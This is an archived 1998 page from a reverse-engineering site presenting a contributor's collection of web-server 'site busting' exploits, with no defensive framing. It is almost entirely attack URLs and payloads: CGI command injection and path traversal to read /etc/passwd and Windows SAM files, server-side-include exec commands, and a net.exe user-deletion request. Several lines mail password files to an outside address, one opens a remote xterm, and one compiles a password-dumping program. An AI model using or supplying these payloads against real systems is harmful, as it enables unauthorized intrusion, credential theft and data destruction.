servexpl.htm: Some nice site busting techniques

ideale
CGI-Busting

Site Busting
Rudicarell,'s Some nice site busting techniques

courtesy of fravia+'s page of reverse engineering

12 November 1998

Well, this is an interesting addition... only for real reversers, though, beginners, please go study some elementary site busting first... for all the other ones... I don't think I need to explain you how interesting this stuff is... Enjoy! :-) 
hi fravia+,
this is my collection of "how to exploit weak sites with your browser"
i'm working an a document which includes very new exploits .. i'll let you
know when it is ready ... 

haveaniceday

RUDICARELL 

# test cgi's
/cgi-bin/test-cgi?\whatever
/cgi-bin/test-cgi?\help&0a/bin/cat%20/etc/passwd
/cgi-bin/test-cgi?/*
/cgi-bin/test-cgi?* HTTP/1.0
/cgi-bin/test-cgi?x *
/cgi-bin/nph-test-cgi?* HTTP/1.0
/cgi-bin/nph-test-cgi?x *

# jj 
/cgi-bin/jj?pwd=SDGROCKS&pop=0&name=rudi&adr=elder4&phone=4523534~/bin/ls

# betterones

/cgi-bin/info2www?(../../../../../../../bin/mail rudicarell@hotmail.com 
</etc/passwd)
/cgi-bin/blabla?%0a/bin/cat%20/etc/passwd
/cgi-bin/finger?tiedotus@uta.fi%3B%2Fbin%2Fmail+rudicarell@hotmail.com+%3C+etc%2Fpasswd
/cgi-bin/phf?Qalias=x%0a/bin/cat%20/etc/passwd
/cgi-bin/phf?%0a blablabla 
&Qalias=&Qname=&Qemail=&Qnickname=&Qoffice_phone= ... usw
/cgi-bin/php.cgi?/etc/passwd
/cgi-bin/fi?/etc/passwd
/cgi-bin/wais.pl/set%20Gopher=/bin/cat%20/etc/passwd
/cgi-bin/webdist.cgi?/bin/mail%20:/etc/passwd[me@myhost.com]
/cgi-bin/textcounter.pl?/;IFS=\8;(ps ax;cd ..;cd ..;cd ..;cd etc;cat 
hosts;set)\|echo;echo|

# other stuff
/dir/doit.phtml?/home/ftp/incoming/executemycode.phtml
/cgi-bin/AnyForm2?			...???
/cgi-bin/infogate? 			...???
/cgi-bin/test.bat?&dir 					.... netscape server
/scripts/test.bat+%26dir+%26time+%26abracadabra.exe 	.... netscape 
server

# microfuck

/guti.asp::$DATA		asp ......
/global.asa			asp ......

# long filenames :)
/somewhere/VERYLON~.HTM			.... user save verylongyy.htm file

# quid pro quo server
/site.name/server%20logfile		.... quid pro quo - server

# basic auth and others 
/cgi-bin/www-sql/protected_directory/irgendwas.html
/cgi-bin/htmlscript?../../../../../../etc/passwd
/cgi-bin/campas?%0acat%0a/etc/passwd%0a
/cool-logs/mlog.html?screen=/etc/passwd
/cool-logs/mylog.html?screen=/etc/passwd
/cgi-bin/view-source?../../../../../../../etc/passwd
/cgi-bin/webgais 
Content-length: (laenge des exploits)
query=';mail+rudicarell\@hotmail.com</etc/passwd;echo'&output=subject&domain=paragraph

# sgi silicon graphics

/cgi-bin/handler/carelli;cat   /etc/passwd|?data=Download	(sgis! nur 
tabs!)
/cgi-bin/pfdispaly.cgi?'%0A/bin/uname%20-a|'			(sgis!)
/cgi-bin/pfdispaly.cgi?/../../../../etc/motd			(sgis! alte version)
/cgi-bin/aglimpse/80|IFS=5;CMD=5mail5rudicarell\@hotmail.com\</etc/passwd;eval$CMD;echo 

# frontpage extensions 
www.domain.com/beliebiges_directory/_vti_cnf		=  directory
www.domain.com/_vti_pvt					=  world writeable

# old but still working IIS perl.exe 
nt/scripts/perl.exe?%20-e%20"system%20('dir%20c:\\winnt35\\repair');"

# example bor bad perl oa 
;xterm -display my.ip.address:0 &
john;echo "#include \"pwd.h\"">/tmp/shadow.c
john;echo "main(){struct passwd *p;while(p=getpwent())">>/tmp/shadow.c
john;echo 
"printf(\"%s:%s:%d:%d:%s:%s:%s\\n\",p->pw-name,">>/tmp/shadow.c
john;echo "p->pw_passwd,p->pw_uid,p->pw_gid,p->pw_gecos,">>/tmp/shadow.c
john;echo "p->pw_dir,p->pw_shell);}">>/tmp/shadow.c
john;cc -o /tmp/shadow /tmp/shadow.c
john;/tmp/shadow>>/tmp/passwd
john;/bin/cat /tmp/passwd|/bin/mail remailer@some.remailer.com
john;rm /tmp/shadow*;rm /tmp/passwd

# sometimes its really bad
~root 
~root/etc/passwd    (zum beispiel)
altavista    ....  url:etc AND link:passwd  ... oder ... root: 0:0
                   url:.htaccess .. oder .. url:.htpasswd

# NCSA files 
httpd.conf   configure the httpd service
srm.conf     scripts and documents reside
access.conf  service features for all browsers
.htaccess    Limits access on a directory-by-directory basis
http .... bla bla /.htaccess            (NCSA .........)

# microfuck
http ... bla bla .. /scripts/blabla.bat?&dir+c:\+?&time
                             test.bat+%26dir+%26time+%26pfieffer.exe

# novell 
http ... bla bla .. /files.pl? ../../blabla
http ... bla bla .. /scripts/convert.bas?../../any_file_on_sys_volume

# MAC WEBSTAR  
http ... bla bla .. /M_A_C_H_T_T_P_V_E_R_S_I_O_N

# lotus domino server (this is really cool)
http ... /domcfg.nsf/?open		
htto ... /domcfg.nsf/URLRedirect/?OpenForm
http:... /database.nsf/viewname?SearchView&Query="*"

# nt carbo server ****
http://host/carbo.dll?icatcommand=..\..\winnt\win.ini&catalogname=catalog

#example for server side includes anon-ftp upload****

<!--#exec cmd="/bin/ls"-->
<!--#exec cmd="mail me@my.org < cat /etc/passwd"-->
<!--#exec cmd="chmod 777 ~ftp/incoming/uploaded_hack_script"-->
<!--#exec cmd="~ftp/incoming/uploaded_hack_script"-->
<!--#exec cmd="find / -name foobar -print"-->
<!--#include file="schweinenasenfile" -->

# metaweb servers
http://mail.server.com:5000/../smusers.txt
http://mail.server.com:5000/../../winnt/repair/sam._
http://mail.server.com:5000/../../winnt/system32/net.exe?
http://mail.server.com:5000/../../winnt/system32/net.exe?user%20joe%20/delete
port:2040 = javaconfig
port:5000 = mail 
port:5001 = -"-
http://www.metainfo.com/products/sendmail/users.htm
http://www.metainfo.com/products/metaip/users.htm

# verity search software ******
s97_cgi.exe?Action=FormGen&ServerKey=Primary&Template=irgendwas (nt)
search97.vts?HLNavigate=On&querytext=dcm&ServerKey=Primary&ResultTemplate=../../../../../../../etc/hosts&ResultStyle=simple&ResultCount=20&collection=books

# uaaa |-) zhhhh wwwboard.html /wwwboard/passwd.txt ****
wwwadmin.pl oder wwwadmin.cgi

# cgi von hylafax ***
/cgi-bin/faxsurvey?/bin/ls%20-a

# other microfuck
uploader.exe/		

# new lotus-domino

http://www.server.com/database.nsf/viewname?SearchView&Query="*"

/*end*/
To ideale

(c) 2000: [fravia+], all rights reserved